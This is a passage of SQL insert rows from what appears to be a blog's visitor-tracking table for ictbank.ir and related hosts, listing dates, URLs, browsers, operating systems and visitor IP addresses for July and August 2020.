(3764,'2020-07-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3765,'2020-07-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(3766,'2020-07-21','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(3767,'2020-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','61.216.139.13','000',0,66,0),
(3768,'2020-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.29.235','000',0,1,0),
(3769,'2020-07-22','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.229.147.234','000',0,3,0),
(3770,'2020-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.164.111.250','000',0,1,0),
(3771,'2020-07-22','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.204.91.220','000',0,2,0),
(3772,'2020-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.239.93','000',0,1,0),
(3773,'2020-07-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,1,0),
(3774,'2020-07-22','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.74','000',0,1,0),
(3775,'2020-07-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3776,'2020-07-22','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','176.193.243.44','000',0,1,0),
(3777,'2020-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.141.124','000',0,1,0),
(3778,'2020-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.158.36.183','000',0,1,0),
(3779,'2020-07-22','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(3780,'2020-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.27.124','000',0,1,0),
(3781,'2020-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.215.57','000',0,1,0),
(3782,'2020-07-22','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','34.218.79.190','000',0,1,0),
(3783,'2020-07-22','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.139.70.45','000',0,1,0),
(3784,'2020-07-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(3785,'2020-07-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','176.193.243.44','000',0,1,0),
(3786,'2020-07-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','101.21.145.129','000',0,1,0),
(3787,'2020-07-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(3788,'2020-07-23','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.103','000',0,2,0),
(3789,'2020-07-23','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','120.52.152.20','000',0,1,0),
(3790,'2020-07-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.117','000',0,1,0),
(3791,'2020-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.136.114','000',0,1,0),
(3792,'2020-07-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(3793,'2020-07-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3794,'2020-07-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(3795,'2020-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.156.141','000',0,1,0),
(3796,'2020-07-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','1.180.156.219','000',0,2,0),
(3797,'2020-07-23','http://ictbank.ir/blog','Chrome','OS X','10.12.0',NULL,NULL,'','89.248.172.208','000',0,1,0),
(3798,'2020-07-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,1,0),
(3799,'2020-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.173.113','000',0,1,0),
(3800,'2020-07-23','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.130','000',0,2,0),
(3801,'2020-07-23','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.135','000',0,1,0),
(3802,'2020-07-23','http://www.ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.132','000',0,1,0),
(3803,'2020-07-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(3804,'2020-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.21.47','000',0,1,0),
(3805,'2020-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(3806,'2020-07-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','115.84.92.32','000',0,1,0),
(3807,'2020-07-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','183.89.211.234','000',0,1,0),
(3808,'2020-07-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','187.189.31.243','000',0,1,0),
(3809,'2020-07-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.164.217.172','000',0,1,0),
(3810,'2020-07-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','183.88.240.168','000',0,1,0),
(3811,'2020-07-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.140','000',0,1,0),
(3812,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.159.6','000',0,1,0),
(3813,'2020-07-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(3814,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.156.150','000',0,1,0),
(3815,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','Unknown',NULL,NULL,'','69.25.58.61','000',0,1,0),
(3816,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.188.175','000',0,1,0),
(3817,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.14','000',0,1,0),
(3818,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.215.124.95','000',0,1,0),
(3819,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.141.144.86','000',0,1,0),
(3820,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.221','000',0,1,0),
(3821,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.129.220.3','000',0,1,0),
(3822,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.54.126.140','000',0,1,0),
(3823,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.74.138.9','000',0,1,0),
(3824,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.133','000',0,1,0),
(3825,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.5','000',0,1,0),
(3826,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.56.148','000',0,1,0),
(3827,'2020-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.224.60','000',0,1,0),
(3828,'2020-07-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(3829,'2020-07-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3830,'2020-07-24','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','54.149.164.146','000',0,1,0),
(3831,'2020-07-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(3832,'2020-07-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','89.248.172.208','000',0,1,0),
(3833,'2020-07-25','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3834,'2020-07-25','https://www.baidu.com','Internet Explorer','Windows','9.0',NULL,NULL,'','23.254.164.48','000',0,1,0),
(3835,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','Unknown',NULL,NULL,'','69.25.58.61','000',0,1,0),
(3836,'2020-07-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(3837,'2020-07-25','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','59.110.8.96','000',0,2,0),
(3838,'2020-07-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.63','000',0,1,0),
(3839,'2020-07-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','195.154.39.164','000',0,1,0),
(3840,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.146.186','000',0,1,0),
(3841,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.22.102','000',0,1,0),
(3842,'2020-07-25','http://mail.design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','51.89.201.9','000',0,3,0),
(3843,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.132.223','000',0,1,0),
(3844,'2020-07-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.243.56.121','000',0,1,0),
(3845,'2020-07-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3846,'2020-07-25','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','51.89.203.212','000',0,1,0),
(3847,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.27.91','000',0,2,0),
(3848,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.141.27','000',0,1,0),
(3849,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','70.40.218.93','000',0,2,0),
(3850,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.130.84','000',0,1,0),
(3851,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.6','000',0,1,0),
(3852,'2020-07-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(3853,'2020-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.211.219.119','000',0,2,0),
(3854,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.11.20','000',0,1,0),
(3855,'2020-07-26','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(3856,'2020-07-26','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.66.176.55','000',0,1,0),
(3857,'2020-07-26','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.70.186.217','000',0,3,0),
(3858,'2020-07-26','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','38.74.14.134','000',0,1,0),
(3859,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.190.100','000',0,1,0),
(3860,'2020-07-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','31.13.115.1','000',0,1,0),
(3861,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','142.93.157.43','000',0,2,0),
(3862,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','138.197.148.140','000',0,1,0),
(3863,'2020-07-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3864,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.12.253.83','000',0,1,0),
(3865,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.114.95.70','000',0,1,0),
(3866,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.167.190.212','000',0,1,0),
(3867,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.73','000',0,1,0),
(3868,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','112.78.211.46','000',0,1,0),
(3869,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.17','000',0,1,0),
(3870,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(3871,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.143','000',0,1,0),
(3872,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.88.49.25','000',0,1,0),
(3873,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.62.103.239','000',0,1,0),
(3874,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.14','000',0,1,0),
(3875,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.151.248.11','000',0,1,0),
(3876,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.110.192','000',0,1,0),
(3877,'2020-07-26','http://ictbank.ir/blog','Chrome','Ubuntu','Unknown',NULL,NULL,'','185.255.133.240','000',0,1,0),
(3878,'2020-07-26','http://ictbank.ir/blog','Chrome','OS X','10.11.3',NULL,NULL,'','91.217.76.11','000',0,1,0),
(3879,'2020-07-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.57.191.240','000',0,1,0),
(3880,'2020-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3881,'2020-07-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3882,'2020-07-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.227.144.226','000',0,1,0),
(3883,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,1,0),
(3884,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.108.74','000',0,1,0),
(3885,'2020-07-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3886,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(3887,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.167.190.198','000',0,1,0),
(3888,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.188','000',0,1,0),
(3889,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.8','000',0,1,0),
(3890,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.208','000',0,1,0),
(3891,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.21','000',0,1,0),
(3892,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.50.88.43','000',0,1,0),
(3893,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.41.148.252','000',0,1,0),
(3894,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.249.127.37','000',0,1,0),
(3895,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.40','000',0,1,0),
(3896,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','43.241.57.18','000',0,1,0),
(3897,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.187','000',0,1,0),
(3898,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','137.74.173.217','000',0,1,0),
(3899,'2020-07-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(3900,'2020-07-27','http://ictbank.ir/blog','Firefox','OS X','10.9',NULL,NULL,'','109.102.111.58','000',0,3,0),
(3901,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.107.109','000',0,1,0),
(3902,'2020-07-27','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','37.194.163.55','000',0,1,0),
(3903,'2020-07-27','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,1,0),
(3904,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.152.38','000',0,1,0),
(3905,'2020-07-27','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','212.82.40.75','000',0,1,0),
(3906,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.172.135','000',0,1,0),
(3907,'2020-07-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(3908,'2020-07-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.204.8.130','000',0,2,0),
(3909,'2020-07-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','77.247.109.114','000',0,1,0),
(3910,'2020-07-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(3911,'2020-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.17.8','000',0,1,0),
(3912,'2020-07-28','http://ictbank.ir/blog','Chrome','Windows','Unknown',NULL,NULL,'','69.25.58.61','000',0,2,0),
(3913,'2020-07-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3914,'2020-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.141.130','000',0,1,0),
(3915,'2020-07-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3916,'2020-07-28','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','20.186.33.214','000',0,10,0),
(3917,'2020-07-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,2,0),
(3918,'2020-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.221.207','000',0,1,0),
(3919,'2020-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.15.86.148','000',0,1,0),
(3920,'2020-07-28','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','3.123.8.249','000',0,1,0),
(3921,'2020-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.45.35','000',0,1,0),
(3922,'2020-07-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(3923,'2020-07-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3924,'2020-07-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(3925,'2020-07-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','109.102.111.37','000',0,2,0),
(3926,'2020-07-29','http://design-arena.ir/blog','Internet Explorer','Windows','5.0',NULL,NULL,'','45.90.58.33','000',0,1,0),
(3927,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.77.186','000',0,1,0),
(3928,'2020-07-29','http://design-arena.ir/blog','Chrome','OS X','10.12.6',NULL,NULL,'','51.15.78.133','000',0,1,0),
(3929,'2020-07-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(3930,'2020-07-29','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','104.219.53.83','000',0,1,0),
(3931,'2020-07-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(3932,'2020-07-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','197.83.213.187','000',0,1,0),
(3933,'2020-07-29','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3934,'2020-07-29','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,2,0),
(3935,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.97.238','000',0,1,0),
(3936,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.30.238.187','000',0,2,0),
(3937,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.88.10','000',0,1,0),
(3938,'2020-07-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.21.77.158','000',0,1,0),
(3939,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.29','000',0,1,0),
(3940,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.18','000',0,1,0),
(3941,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.226.134.13','000',0,1,0),
(3942,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,2,0),
(3943,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.185.4','000',0,1,0),
(3944,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.32','000',0,1,0),
(3945,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.143','000',0,1,0),
(3946,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.121.104.93','000',0,1,0),
(3947,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.7','000',0,1,0),
(3948,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.141','000',0,1,0),
(3949,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','200.58.119.118','000',0,1,0),
(3950,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.188','000',0,1,0),
(3951,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.62.103.239','000',0,1,0),
(3952,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.9','000',0,1,0),
(3953,'2020-07-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(3954,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.185.35','000',0,1,0),
(3955,'2020-07-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.70','000',0,1,0),
(3956,'2020-07-29','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(3957,'2020-07-29','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','132.145.163.147','000',0,3,0),
(3958,'2020-07-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(3959,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.33','000',0,2,0),
(3960,'2020-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.182.224.44','000',0,2,0),
(3961,'2020-07-30','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.26.68','000',0,1,0),
(3962,'2020-07-30','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','112.80.138.245','000',0,1,0),
(3963,'2020-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.57.0.214','000',0,1,0),
(3964,'2020-07-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(3965,'2020-07-30','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','141.101.143.49','000',0,87,0),
(3966,'2020-07-30','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(3967,'2020-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.178.222','000',0,1,0),
(3968,'2020-07-30','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','157.245.90.36','000',0,1,0),
(3969,'2020-07-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,1,0),
(3970,'2020-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.208.62.200','000',0,1,0),
(3971,'2020-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.188.224','000',0,1,0),
(3972,'2020-07-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(3973,'2020-07-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.15.86.148','000',0,1,0),
(3974,'2020-07-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(3975,'2020-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.96.78','000',0,1,0),
(3976,'2020-07-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(3977,'2020-07-31','http://ictbank.ir/blog','Opera','Windows','6.3',NULL,NULL,'','176.193.4.213','000',0,1,0),
(3978,'2020-07-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.138','000',0,1,0),
(3979,'2020-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.120.164','000',0,1,0),
(3980,'2020-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.138.78','000',0,1,0),
(3981,'2020-07-31','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.189.90','000',0,1,0),
(3982,'2020-07-31','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','43.247.69.19','000',0,3,0),
(3983,'2020-07-31','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','52.255.202.36','000',0,1,0),
(3984,'2020-07-31','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','191.252.221.237','000',0,1,0),
(3985,'2020-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.58.91.238','000',0,1,0),
(3986,'2020-07-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(3987,'2020-07-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','122.13.162.37','000',0,3,0),
(3988,'2020-07-31','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.90.58.33','000',0,1,0),
(3989,'2020-08-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(3990,'2020-08-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','40.79.251.50','000',0,1,0),
(3991,'2020-08-01','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','42.116.19.78','000',0,11,0),
